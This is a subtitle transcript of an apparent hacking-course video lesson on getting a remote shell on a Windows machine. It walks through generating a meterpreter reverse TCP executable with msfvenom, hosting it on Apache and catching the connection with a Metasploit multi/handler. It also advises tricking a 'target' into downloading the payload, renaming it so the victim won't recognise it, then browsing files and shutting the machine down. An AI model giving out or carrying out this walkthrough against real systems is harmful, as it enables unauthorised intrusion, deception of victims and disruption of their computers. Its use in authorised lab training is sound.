1
00:00:00,840 --> 00:00:08,670
In this lesson, we will see how we can gain remote access to our target system by using a payload which

2
00:00:08,670 --> 00:00:10,850
is created using the Metasploit framework.

3
00:00:12,210 --> 00:00:17,610
So for this, we are going to be on a Kali machine, and Windows

4
00:00:17,620 --> 00:00:19,430
is the target system.

5
00:00:19,920 --> 00:00:20,230
Right.

6
00:00:21,360 --> 00:00:24,670
So I have written down some steps for you to follow.

7
00:00:24,960 --> 00:00:31,400
Right now, the very first command is msfvenom.

8
00:00:31,680 --> 00:00:36,240
So msfvenom is going to help us in order to generate the payload.

9
00:00:36,780 --> 00:00:37,090
Right.

10
00:00:37,710 --> 00:00:44,540
So first of all, let's do msfvenom -h; -h is for help.

11
00:00:45,000 --> 00:00:45,320
Right.

12
00:00:45,690 --> 00:00:51,650
So it's going to show all of the available options to be used with the msfvenom

13
00:00:51,660 --> 00:00:52,140
command.

14
00:00:54,590 --> 00:00:56,820
Right, let's see.

15
00:00:57,350 --> 00:01:04,880
There are so many options, but the one which we are going to use is -p, which stands for payload.

16
00:01:05,990 --> 00:01:07,040
So let's do that.

17
00:01:09,270 --> 00:01:16,410
msfvenom -p, then we are generating a payload for Windows, and then meterpreter

18
00:01:17,940 --> 00:01:25,800
and then reverse TCP. Right, now we have to set LHOST, that is the local host.

19
00:01:26,190 --> 00:01:28,230
So the local host is our Kali.

20
00:01:31,330 --> 00:01:38,670
And LPORT will be one, two, three, four, right?

21
00:01:39,280 --> 00:01:41,460
And then we have to set the format.

22
00:01:41,470 --> 00:01:49,420
So -f is for format, so it's going to be exe for Windows, and then the name of the payload.

23
00:01:49,580 --> 00:01:51,070
Let's say, Jack what.

24
00:01:52,150 --> 00:01:54,520
OK, hit enter.
25
00:01:54,830 --> 00:02:06,070
And msfvenom is going to generate a Windows payload for us with the name Jack what dot exe. Right, now we're going to take the

26
00:02:06,070 --> 00:02:09,310
generated payload and host it on our local machine.

27
00:02:09,580 --> 00:02:09,910
Right.

28
00:02:10,870 --> 00:02:12,910
By using the Apache web server.

29
00:02:14,290 --> 00:02:20,320
Now, if you go to the Internet and search for the statistics, then you will know

30
00:02:20,320 --> 00:02:27,470
that around 60 percent of the websites from all around the world are running on the Apache web server.

31
00:02:28,060 --> 00:02:34,860
OK, now, if you don't know how to configure Apache, then I have explained this in a practical, in very

32
00:02:34,880 --> 00:02:39,250
detail, in the second section of this course, which is called Linux for Beginners.

33
00:02:39,460 --> 00:02:50,010
OK, now let's copy our payload, which is Jack what, to /var/www/html.

34
00:02:50,350 --> 00:02:55,200
So this path is the default path for the Apache web server.

35
00:02:55,210 --> 00:02:55,480
Right.

36
00:02:55,720 --> 00:03:00,790
So if you are going to host your website, then you have to use this folder, that is html, and you have

37
00:03:00,790 --> 00:03:02,820
to host your website under this folder.

38
00:03:04,990 --> 00:03:06,920
So let's copy that.

39
00:03:08,030 --> 00:03:12,050
Now we have to start two services.

40
00:03:12,100 --> 00:03:16,180
The first is service postgresql,

41
00:03:16,180 --> 00:03:17,220
that is PostgreSQL.

42
00:03:17,350 --> 00:03:19,000
OK, start.

43
00:03:22,190 --> 00:03:26,910
Right, now we have to start the Apache web server as well.

44
00:03:26,930 --> 00:03:30,110
So service apache2 start.

45
00:03:33,610 --> 00:03:43,990
Right, then now let's start msfconsole, that is the Metasploit framework console, so.

46
00:03:45,630 --> 00:03:52,120
The next step would be to use the exploit, right, use exploit/multi/handler.
47
00:03:53,550 --> 00:03:54,790
So it's a very important step.

48
00:03:54,810 --> 00:03:58,040
So we'll start with use exploit/multi/handler.

49
00:03:58,530 --> 00:04:01,150
Then we are going to set the payload for Windows.

50
00:04:01,590 --> 00:04:07,200
OK, then we'll set LHOST and LPORT, and then we will use the exploit feature.

51
00:04:08,130 --> 00:04:14,440
OK, so this is how we are going to get remote access to our target PC.

52
00:04:15,060 --> 00:04:19,740
Right now, let's move back to Kali.

53
00:04:23,260 --> 00:04:28,960
OK, it says it is starting the Metasploit framework console, so we have to wait for it.

54
00:04:31,670 --> 00:04:48,400
Then, OK, so use exploit/multi/handler, and then set the payload for windows/meterpreter.

55
00:04:50,270 --> 00:04:55,460
OK, it's going to autocomplete because I recently pressed that key.

56
00:04:57,210 --> 00:04:59,160
So we have to wait for this.

57
00:05:03,140 --> 00:05:08,070
meterpreter, reverse TCP.

58
00:05:09,260 --> 00:05:19,820
Now set LHOST, and then set LPORT, which is one, two, three,

59
00:05:19,820 --> 00:05:26,000
four. But now it's time to exploit, right.

60
00:05:28,160 --> 00:05:30,850
OK, so show options, right.

61
00:05:33,030 --> 00:05:37,950
Show options, to see all of the available options to be used here, right?

62
00:05:38,250 --> 00:05:46,440
So it has mentioned that you have set LHOST and you have already set LPORT. Then now exploit -h,

63
00:05:46,440 --> 00:05:47,940
-h for help.

64
00:05:48,900 --> 00:05:51,210
And we are going to use two different options.

65
00:05:51,330 --> 00:05:57,900
One is -j, which says run in the context of a job, and then -z, which says do not interact

66
00:05:57,900 --> 00:06:00,180
with the session after successful exploitation.

67
00:06:00,690 --> 00:06:01,050
Right.

68
00:06:01,980 --> 00:06:08,790
So exploit -j -z, and let's move to our target PC, OK?
69
00:06:09,810 --> 00:06:19,160
Now it's up to you how you show your creativity to force your target to go to the URL where you have

70
00:06:19,170 --> 00:06:20,780
hosted the exploit.

71
00:06:21,060 --> 00:06:23,590
OK, I mean where you are hosting the payload.

72
00:06:24,060 --> 00:06:35,850
So suppose that the target visited your website and somehow you managed to redirect him to the payload section,

73
00:06:36,180 --> 00:06:37,410
which would be Jack

74
00:06:37,420 --> 00:06:39,760
what dot exe.

75
00:06:40,200 --> 00:06:45,770
So then dot, dot, dot, dot, this is your website address.

76
00:06:46,290 --> 00:06:51,960
OK, suppose this is your website address, and then Jack what dot exe is the page

77
00:06:52,950 --> 00:06:59,550
which you want your target to visit in order to download the exploit.

78
00:06:59,550 --> 00:07:06,280
See, as soon as your target lands on this page, the download has been started and asks for the payload.

79
00:07:07,440 --> 00:07:15,520
Now your target would not know that this is a payload.

80
00:07:16,470 --> 00:07:17,990
OK, so you can change its name.

81
00:07:18,210 --> 00:07:22,030
Let's say you name it something, or like that.

82
00:07:22,080 --> 00:07:24,300
OK, let me run the exe.

83
00:07:27,480 --> 00:07:37,190
Right now, let's move to Kali. And exploit, it says started reverse TCP handler.

84
00:07:38,140 --> 00:07:39,990
Okay, so let's see.

85
00:07:40,980 --> 00:07:44,920
Sessions. OK, it says there is no session.

86
00:07:44,940 --> 00:07:47,390
OK, so let's try exploit hyphen

87
00:07:47,400 --> 00:07:48,990
j, hyphen z again.

88
00:07:52,190 --> 00:07:57,070
Exploit failed because, OK, one, two, three, four is already in use.

89
00:08:01,310 --> 00:08:09,590
OK, so it automatically started this session again. That is, it closes the event, but the reverse port,

90
00:08:10,130 --> 00:08:14,760
just to stop the previous services, and then it has started again, right?
91
00:08:16,250 --> 00:08:18,210
So it says sending stage.

92
00:08:18,230 --> 00:08:19,550
OK, so we made a session.

93
00:08:19,550 --> 00:08:20,360
One more point.

94
00:08:20,960 --> 00:08:21,560
That's good.

95
00:08:23,030 --> 00:08:24,170
Let's take a...

96
00:08:25,130 --> 00:08:27,920
And let's see whether the session started or not.

97
00:08:29,190 --> 00:08:29,480
Yes.

98
00:08:29,480 --> 00:08:30,680
The session has been started.

99
00:08:31,320 --> 00:08:31,580
Right.

100
00:08:32,660 --> 00:08:34,910
So let's use this session.

101
00:08:38,210 --> 00:08:47,180
OK, so sessions -i and then the session number, which is one, so sessions -i

102
00:08:47,360 --> 00:08:55,290
and then one. Done. Now we are in the target system, right.

103
00:08:55,700 --> 00:09:05,690
If you want to verify, let's do pwd. We are in the System32 folder of the C drive of our target system.

104
00:09:05,970 --> 00:09:06,340
Right.

105
00:09:06,620 --> 00:09:07,730
Let's do ls.

106
00:09:09,420 --> 00:09:13,890
So it will list all of the directories and files out there, see?

107
00:09:15,440 --> 00:09:23,310
OK, now let's perform some more commands like ifconfig, so let's do that.

108
00:09:24,530 --> 00:09:30,890
So ifconfig, it says ten, zero, two, seven.

109
00:09:31,370 --> 00:09:36,650
Good, let's verify whether the information is correct or not.

110
00:09:39,100 --> 00:09:41,140
So let's open the command prompt.

111
00:09:44,320 --> 00:09:52,340
And let's do ipconfig, let's verify. See, here it is.

112
00:09:53,200 --> 00:09:56,410
OK, so ten, zero, two, seven.

113
00:09:59,070 --> 00:09:59,760
That's good.

114
00:10:01,200 --> 00:10:07,320
Now, we can also shut down our target PC, right?

115
00:10:07,740 --> 00:10:09,110
So let's do that.

116
00:10:09,120 --> 00:10:11,400
So poweroff, and then.

117
00:10:12,160 --> 00:10:13,110
OK, come on.

118
00:10:13,830 --> 00:10:16,770
So we hope to shut it down.
119
00:10:18,540 --> 00:10:22,080
See, the Windows 10 is going to power off.

120
00:10:22,410 --> 00:10:23,720
It's shutting down.

121
00:10:24,270 --> 00:10:24,600
Right.

122
00:10:25,140 --> 00:10:31,430
So this is how we can get remote access to our target system and do whatever we want to do.